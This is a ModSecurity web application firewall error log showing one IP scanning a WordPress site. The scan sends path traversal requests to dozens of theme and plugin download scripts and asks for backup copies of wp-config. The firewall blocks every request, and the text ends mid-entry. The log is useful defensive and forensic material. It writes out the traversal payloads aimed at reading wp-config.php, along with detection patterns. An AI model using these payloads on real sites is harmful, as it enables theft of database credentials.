[severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SCv1/download.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHwAAAAMk"] [Wed Oct 12 02:48:58.619591 2022] [:error] [pid 22972:tid 140534391719680] [client 185.189.115.30:50116] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/adminonline/product/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/adminonline/product/download.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHwQAAANA"] [Wed Oct 12 02:48:58.781272 2022] [:error] [pid 22972:tid 140534374934272] [client 185.189.115.30:50118] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHwgAAANI"] [Wed Oct 12 02:48:58.947434 2022] [:error] [pid 22972:tid 140534597625600] [client 185.189.115.30:50122] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/eshop-magic/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/eshop-magic/download.php"] [unique_id "Y0ZxauLrJ0tgpRmNRAaHxAAAAMA"] [Wed Oct 12 02:48:59.106763 2022] [:error] [pid 22338:tid 140534433683200] [client 185.189.115.30:50124] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "Y0Zxa2INFIoIk7hPzpaZOwAAAEs"] [Wed Oct 12 02:48:59.278087 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:50126] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/u_parts/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/u_parts/force-download.php"] [unique_id "Y0Zxa6BKlkjFPqrcdjM3vQAAAAo"] [Wed Oct 12 02:48:59.429339 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:50128] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/nishizawa_tmp/force-download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/nishizawa_tmp/force-download.php"] [unique_id "Y0Zxa-LrJ0tgpRmNRAaHxQAAAMU"] [Wed Oct 12 02:48:59.599890 2022] [:error] [pid 22337:tid 140534589232896] [client 185.189.115.30:50130] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cafesalivation/download.php?filename=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cafesalivation/download.php"] [unique_id "Y0Zxa6BKlkjFPqrcdjM3vgAAAAE"] [Wed Oct 12 02:48:59.765105 2022] [:error] [pid 22338:tid 140534484039424] [client 185.189.115.30:50132] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/liberator/inc/php/download.php?download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/liberator/inc/php/download.php"] [unique_id "Y0Zxa2INFIoIk7hPzpaZPAAAAEU"] [Wed Oct 12 02:48:59.915980 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:50134] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/FR0_theme/down.php?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/FR0_theme/down.php"] [unique_id "Y0Zxa9mZws0mEkXxGo-VawAAAI4"] [Wed Oct 12 02:49:00.073034 2022] [:error] [pid 22339:tid 140534425290496] [client 185.189.115.30:50136] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/uploads/sb-download.php?file=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/sb-download.php"] [unique_id "Y0ZxbNmZws0mEkXxGo-VbAAAAIw"] [Wed Oct 12 02:49:00.234100 2022] [:error] [pid 22339:tid 140534416897792] [client 185.189.115.30:50138] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/clinell/include/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/clinell/include/download.php"] [unique_id "Y0ZxbNmZws0mEkXxGo-VbQAAAI0"] [Wed Oct 12 02:49:00.399534 2022] [:error] [pid 22972:tid 140534366541568] [client 185.189.115.30:50148] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ypo-theme/download.php"] [unique_id "Y0ZxbOLrJ0tgpRmNRAaHxgAAANM"] [Wed Oct 12 02:49:00.568218 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:50150] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "Y0ZxbOLrJ0tgpRmNRAaHxwAAANc"] [Wed Oct 12 02:49:00.744717 2022] [:error] [pid 22972:tid 140534572447488] [client 185.189.115.30:50152] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "Y0ZxbOLrJ0tgpRmNRAaHyAAAAMM"] [Wed Oct 12 02:49:18.644477 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:50222] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y0ZxfuLrJ0tgpRmNRAaH1QAAANc"] [Wed Oct 12 02:49:18.796308 2022] [:error] [pid 22338:tid 140534349756160] [client 185.189.115.30:50224] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y0ZxfmINFIoIk7hPzpaZQgAAAFU"] [Wed Oct 12 02:49:22.576918 2022] [:error] [pid 22337:tid 140534475646720] [client 185.189.115.30:50236] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y0ZxgqBKlkjFPqrcdjM3xQAAAAY"] [Wed Oct 12 02:49:49.247586 2022] [:error] [pid 22339:tid 140534450468608] [client 185.189.115.30:50310] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.bak"] [unique_id "Y0ZxndmZws0mEkXxGo-VfgAAAIk"] [Wed Oct 12 02:49:57.459459 2022] [:error] [pid 22339:tid 140534408505088] [client 185.189.115.30:50340] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.old"] [unique_id "Y0ZxpdmZws0mEkXxGo-VhAAAAI4"] [Wed Oct 12 02:50:21.149185 2022] [:error] [pid 22339:tid 140534383326976] [client 185.189.115.30:50408] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.bak"] [unique_id "Y0ZxvdmZws0mEkXxGo-VjAAAAJE"] [Wed Oct 12 02:50:28.646162 2022] [:error] [pid 22337:tid 140534349756160] [client 185.189.115.30:50428] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.old"] [unique_id "Y0ZxxKBKlkjFPqrcdjM32AAAABU"] [Wed Oct 12 02:51:25.267806 2022] [:error] [pid 22339:tid 140534433683200] [client 185.189.115.30:50612] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "Y0Zx_dmZws0mEkXxGo-VoQAAAIs"] [Wed Oct 12 02:51:35.795567 2022] [:error] [pid 22972:tid 140534391719680] [client 185.189.115.30:50640] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ 